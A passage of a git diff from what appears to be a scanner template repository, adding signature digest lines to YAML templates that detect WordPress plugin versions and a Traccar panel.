http/technologies/wordpress/plugins/svg-support.yaml | 2 ++ http/technologies/wordpress/plugins/tablepress.yaml | 2 ++ http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 2 ++ http/technologies/wordpress/plugins/templately.yaml | 2 ++ http/technologies/wordpress/plugins/the-events-calendar.yaml | 2 ++ http/technologies/wordpress/plugins/tinymce-advanced.yaml | 2 ++ .../wordpress/plugins/translatepress-multilingual.yaml | 2 ++ .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 2 ++ .../technologies/wordpress/plugins/under-construction-page.yaml | 2 ++ http/technologies/wordpress/plugins/updraftplus.yaml | 2 ++ http/technologies/wordpress/plugins/user-role-editor.yaml | 2 ++ http/technologies/wordpress/plugins/w3-total-cache.yaml | 2 ++ .../wordpress/plugins/webp-converter-for-media.yaml | 2 ++ http/technologies/wordpress/plugins/webp-express.yaml | 2 ++ .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 2 ++ .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 2 ++ http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 2 ++ .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 2 ++ .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 2 ++ http/technologies/wordpress/plugins/woocommerce-payments.yaml | 2 ++ .../wordpress/plugins/woocommerce-paypal-payments.yaml | 2 ++ .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 2 ++ http/technologies/wordpress/plugins/woocommerce-services.yaml | 2 ++ http/technologies/wordpress/plugins/woocommerce.yaml | 2 ++ http/technologies/wordpress/plugins/wordfence.yaml | 2 ++ http/technologies/wordpress/plugins/wordpress-importer.yaml | 2 ++ http/technologies/wordpress/plugins/wordpress-seo.yaml | 2 ++ http/technologies/wordpress/plugins/worker.yaml | 2 ++ http/technologies/wordpress/plugins/wp-crontrol.yaml | 2 ++ http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 2 ++ http/technologies/wordpress/plugins/wp-file-manager.yaml | 2 ++ http/technologies/wordpress/plugins/wp-google-maps.yaml | 2 ++ http/technologies/wordpress/plugins/wp-mail-logging.yaml | 2 ++ http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 2 ++ http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 2 ++ http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 2 ++ http/technologies/wordpress/plugins/wp-optimize.yaml | 2 ++ http/technologies/wordpress/plugins/wp-pagenavi.yaml | 2 ++ http/technologies/wordpress/plugins/wp-reset.yaml | 2 ++ .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 2 ++ http/technologies/wordpress/plugins/wp-rollback.yaml | 2 ++ http/technologies/wordpress/plugins/wp-seopress.yaml | 2 ++ http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 2 ++ http/technologies/wordpress/plugins/wp-smushit.yaml | 2 ++ http/technologies/wordpress/plugins/wp-statistics.yaml | 2 ++ http/technologies/wordpress/plugins/wp-super-cache.yaml | 2 ++ http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 2 ++ http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 2 ++ http/technologies/wordpress/plugins/wpforms-lite.yaml | 2 ++ http/technologies/wordpress/plugins/wps-hide-login.yaml | 2 ++ http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 2 ++ .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 2 ++ 200 files changed, 400 insertions(+) diff --git a/http/exposed-panels/traccar-panel.yaml b/http/exposed-panels/traccar-panel.yaml index c13cae2715..0983f4a421 100644 --- a/http/exposed-panels/traccar-panel.yaml +++ b/http/exposed-panels/traccar-panel.yaml @@ -25,3 +25,5 @@ http: - 'contains_any(body, "Traccar", "Traccar GPS Tracking System")' - 'status_code == 200' condition: and + +# digest: 490a00463044022038c5e46eaf5d16d03ca8c3a9016c9994b93e08a78dcd2e2878003e52c2bc4bd202203d68918a7fa18048c247c0e01a3b60293b3bbedb73d63ac916705f64125b1b4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..3b20721481 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402205b34bc30b75c1db842ad2234ff2c4aebd1a9ce8ec9b6786eef5daf79b81891f602202ae17303c883defce0eaca097488c1d8598b0e5b1cced30b488c0dd9a1e985b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..0d91af5b2a 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022008399dcf6eca4c837fedf636f2d9e439bb391dc4b42aa9dea5b56ffccc7ad4c8022100fec42d9550544871adc0dd1b0b50c6e0e178557ad4c37750ffc708b4d9849572:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..62a3be6e27 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100b3ece283cdb32931841da7cb46ba5c6c3b92565cae3bb568af7eea7fd24d111a022032183a788b0684c496a59dc1c1c2533d5234e7059b727534989d3f1960ede0bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 1f02455962..c9afe15ca3 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220126e9aab94c078979d6b3e98049d9ee47de5a6e3b6011130e78855b9f95f9ae002200710629b4f2b4609489069dcfeaa946bbed212ff97ace486948c302c3f8aafa4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..a01b4dc8b5 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402205b7296e36c28aa2aa96e7cfc77233df553ac81fa7da9a359cc90e6bdba9fc4c2022018ed77b6b5e0cd47748c1ae2e5627e74d8c5c92588f4fd6e07380490a0352447:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..da144a53b6 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502200a8c82ae94cad964384d2b520d86568f8d459b2470f8db339f99c6cb03c0e133022100ff70d7210f6801bf2f16ea74798f04e006ccb3a498b2fb5644ea41a02dd2bbdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..c4530d5d53 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100bcdffbc2c21600b2cc22aa0a7233f5542d069e4661d31d8bbe81e417499edef4022077b2df0927cd33ce55f7f39f345a153f603d013eac2c1722c91dd54e848e2ae3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..8caf1c0dea 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022047cf2cc1a38a1c326dbf1ab9576d64af7d79c652f2bd5ad49dec8d31b66b61ef02207b8b253c6c626ae78ff03ec169b29c7956d9a66547e6cff53430f87c2da5dbd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..2a1ba679e5 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221009b014e0faecbae7a24161ab850164305d28bedc8daa61f81024b7c15b93d82b6022100baf1d7737e306faa80e6a7652c45034672593853a8af687ff07343d1c53fecb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..aa369714a6 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402201f0463206a814209a145b359ee66902edbbbdbfec97e0e0f907763c22af474560220457f2938b1175c902413a37fa23e0ae63386bc9ada4b8ed76512c637f65d0860:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..26ea903529 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220025ef67774ef14bee62c670ca5cba709f08d6e5bb8a61af9daf5284c3c0149b602200dc8f5ae973f36870a6452a015f583e98a681978a3ba1885aea441820f0dff17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..4efb2aa8ad 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100c1e932f52933f13b6501d0b62a804e5ddf1d737cab54eddff6c0bb652227416802206d5561e4a2e185f88b231561b90e9ef49fc678c06f28b9a26111f2873d0acdae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..d207e0f1e5 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221009898e6eaca1d2d39e76063a4f52d1794eee0950caaf0858b015f3db1fe92613e02207a102a8565bacb2533ca1988e02dbcd68441e11938e9b5dd35b5522a1e9e3402:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..ab66cd5781 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022025572ed5771c838625df82f00bd940c72113c6a941325f6ebadb9c91733e379f022100853a18720e9ee0c0fe90d9cca92622363789608e1544fe30ab2cb6151bdb7390:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..2af921708e 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220407c5fa6ad70d271e714d703c9ab7bc68b5ab65348756b88d5c6a14c587b3bd5022100fbb5444ee3556ce0394b6b094367da0eef893922d3bed5f625aec9d270f08cb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..be5492b28f 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100fca9ca8dd22e8a428784650723bf6595449624fd5d1befc77ebc5265709929c4022100eb3cdb4f7c4e98e2347cf472cd098dab26c097059a3f29f1aec1a99028604e16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..621bb27dd2 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502200d179534e5460b5237b53116bb1f7d31b230c38b606c264395b36766073e1dec022100c2ab47d2f4d1817c9d9427770a70d041f93a613cd10fd6df88201354ea7d8673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..80deaa4889 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100ef835299f348f8b5457e6fda6045f050104123e6deb63bb852802e6c515c452502200f183607c3d26b111241df408b1dec6c51761a531edfc79dc56e33f1c1631062:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index f8691caf0a..fe79a0d607 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100cd7c26a0b7edc13bca50e120d37bf413a70047abd26ee07b773e9e4519a4a2b9022100b3bde475836e6f5a4232eb250410485d16c73d9aba78719260524808211aa540:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..d37575b7e1 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100b8ef6390c79cd53b7503190b6f34a5e0c4c677583f00c5000b5a46eedc69d51602205038725f750dbc8156eb5aa6a2a0ff71eee48b1fc2421f400f390ba81df26203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..cb9482aa4d 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e8d4231faca4c91a5d49dfa67bd824880abf796917cda90247265561e338a4e1022062140e7f8c5b29dbcc27d24ba360ac0aa329321eb0c3faf95dbf3d19a2dbf78f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..9dff0308e5 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502200b5acf197da2ccb059a8698ddcc39cb03c4de0164b4016ca99b33de1d3109c1a022100df691845fbf1485020956f38fd77912cb5418680090f9669e04ad764846910c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..5062977a91 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022017af82a106dbaa0d646c4f013125fd6f5ac1894ba9c77798c7caebcf397eedc5022007b71f9583b807897c99230098f61f7515f67fd720d43c84d2bf297a7c4c47e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..b43a5aedcd 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022079289b2ecbad04244d567b17c021db23e2b9ac411a136e571840d2c531306fd502200622ed634470b5fd4319283eac3796d83d952229a613aed72a447421b8678358:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..b13e6360cf 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100cddb55d18fa111fe9c9e866cb369d77d8be1b1c8bd55795f01e6f3769031e7da022100e3ea0db117efd3f3a596591e37c4efeb848c48f869f676abcaebfae244d0c1c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..dd683d8f75 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100db9c748c5612a78658dd2bce177e2b5d12828f06772e8357be4ff50ffb7f5886022045f7423ba8e7fd579e7a144a71e77cd561b556a79c8f25445c6a47d5318f4b1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..f209168aa4 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100aac01d062631c487e9963d838cbb23822e26865176eaebcca2db08e9fd1c0d78022100c219cdc6e5562fac064211e67430219bcfd19c280975e9b7392c69353253a012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..1e606680ed 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022036862b1f627160fa7da2cf042c0129a59fa4007479aafb01d444b51dcff07425022100f88572578d745c7c7e83a139fa4cc1a34e864d920b7844b57fe25858b67bdce6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..447966cf03 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100f6a4cc7c09d91915b74bcf4e3a122ade9ccb9be1f278e927bcf8bd3652fbf0ee022040d9ae9c7872747ac62e5550906b5d9328784731772fad7174da38d4079c2d14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index e13909fff3..d121c3c9a9 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022013af0bcd7d8b13026328a15c952fbdaf00dc6f3ef70a57a930ac271513e2852b022100a4a6f8fe871bc37ec31ec50410379282b3957069701c7a24d943ec2c98a2a8e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..bb268fff0c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a68e921f27b85656a4cd74d3bd8495d0021929e82d9fd955c521e8929dc93f51022041ed73ecbc181cda7ed4d268ddafe6c600de8a9afc2d72b94f1ddb4e4e46b4e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..cf36d2b24c 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204b29425a37e7603afca939f772d4f73507924674195bdc8958390393351f145c022100cd5ad642044810bddffce2168dbd75e58952f2cd7683bf67bc4eaae4687a3a91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..7ee4c0b70a 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402205a08b92f8904c0aaedc90e2cdbbe93f37a8d420ff2724954f861c94b2b61cb94022061503e244907a0450b86e6b87060f7927fdbec3576a09ed4580b26499d8f9c65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..3294aae2c5 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100b6bbcc8fdaee9ab22b2d295b6e3ddf24a7374e6cab3be361f941bdb1330a6913022100f5b8d94ed42569dd0f4c74911f9d0b3ad477c9ebea24eb42dda8f2c84afbb184:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..643ddb2abc 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a9c2ed250bbaafece3f8712df4a41f587b722ae0519bb49198e2fa0a0400a85302203fe874ba601d169d95194405e12a10f5de63800d18eaa29fbc826edf71569dbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..9c8d47154c 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d6156edca5c899a5aca55d338656e7adf269bc508fae19599a3bfbe1434c3ca8022010989d574bc1a98888ed1f32d754f744b000dd6e0f6d116b6b3440217e6f0fb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..758d809772 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402204923fe45ecddbac71640697b80dc4be5ebbe92e6bd115da65c9163c47a846fff02203f3eda7ecbe5ec017e9ee304d54f325147036a67fdfd8fd0448109c853903408:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index dafbd25c9e..4fae77e1bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022056313ef65b3b257c3653c933e85b6f06bdece76f839447ee71160229e8f3456d022100b3814fd0dec10370ad144dffaf567b71b7e7d9bab53552c89c07496b659f4342:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..3d40828ef9 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402203c30b93ed05c8f5f0617b935e03aa5fda7d90103b44537153cb323fb3c2484e6022005c767f2a1a932f1b701a52082c1ea3b5265d6ebced606cb6cb6be270650bd91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..841a8a4311 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008e3a5caa420d1cfbeaea691ac93341497f11a8660e86c41ca72382c1a763b782022100f8d6ec402a75a2c70aeab580fb202dd78cabe824361fdcea6c7b43533fb9097d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..c35ed9cd91 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 